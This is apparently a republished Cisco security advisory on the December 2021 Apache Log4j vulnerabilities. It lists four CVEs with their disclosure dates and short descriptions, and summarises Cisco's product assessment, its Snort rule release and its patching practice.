Cisco Security Advisory - Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021

[Netwörkheäd]

Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021

<p><strong>Critical Vulnerabilities in Apache Log4j Java Logging Library</strong></p>
<p>On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:&nbsp;</p>
<ul style="list-style: none;">
<li>CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints</li>
</ul>
<p>On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack</li>
</ul>
<p>On December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation</li>
</ul>
<p>On December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:</p>
<ul style="list-style: none;">
<li>CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration</li>
</ul>
<p>For a description of these vulnerabilities, see the <a href="https://logging.apache.org/log4j/2.x/security.html" rel="nofollow">Apache Log4j Security Vulnerabilities</a> page.</p>
<p><strong>Cisco's Response to These Vulnerabilities</strong></p>
<p>Cisco&nbsp;assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco&nbsp;has released Snort rules at the following location: <a href="https://www.snort.org/advisories/talos-rules-2021-12-21">Talos Rules 2021-12-21</a></p>
<p>Product fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.</p>
<p>Cisco&nbsp;has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco&nbsp;products or cloud offerings are impacted by these vulnerabilities.</p>
<p>Cisco's standard practice is to update integrated third-party software components to later versions as they become available.</p>
<p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" rel="nofollow">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd</a></p>

     
         
Security Impact Rating:  Critical
   
   
       
CVE: CVE-2021-44228,CVE-2021-44832,CVE-2021-45046,CVE-2021-45105
Source: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021